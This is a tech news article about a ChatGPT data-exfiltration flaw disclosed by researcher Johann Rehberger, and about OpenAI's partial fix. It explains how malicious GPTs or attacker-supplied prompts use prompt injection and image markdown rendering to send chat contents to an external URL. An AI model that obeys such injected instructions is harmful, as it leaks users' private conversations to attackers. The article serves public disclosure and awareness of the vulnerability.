OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems

(Image credit: Shutterstock/dalebor)

A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.

When Johann Rehberger attempted to alert OpenAI to the potential flaw, he received no response, forcing the researcher to disclose details of the flaw publicly.

Following the disclosure OpenAI released safety checks for ChatGPT that mitigate the flaw, but not completely.

A hasty patch

The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.

A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injecting to exfiltrate the data.

Rehberger initially reported the flaw to OpenAI way back in April 2023, supplying more details on how it can be used in more devious ways through November.

Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

Instead of further pursuing an apparently non-respondent OpenAI, Rehberger instead decided to go public with his discovery, releasing a video demonstration of how his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”

Unfortunately, these new checks do not fully mitigate the flaw, as Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, but a successful return is hit and miss. While these checks have apparently been implemented on the desktop versions of ChatGPT, the flaw remains viable on the iOS mobile app.

Via BleepingComputer

More from TechRadar Pro

TOPICS

Benedict has been writing about security issues for over 7 years, first focusing on geopolitics and international relations while at the University of Buckingham. During this time he studied BA Politics with Journalism, for which he received a second-class honours (upper division), then continuing his studies at a postgraduate level, achieving a distinction in MA Security, Intelligence and Diplomacy. Upon joining TechRadar Pro as a Staff Writer, Benedict transitioned his focus towards cybersecurity, exploring state-sponsored threat actors, malware, social engineering, and national security. Benedict is also an expert on B2B security products, including firewalls, antivirus, endpoint security, and password management.

A hasty patch

Are you a pro? Subscribe to our newsletter

More from TechRadar Pro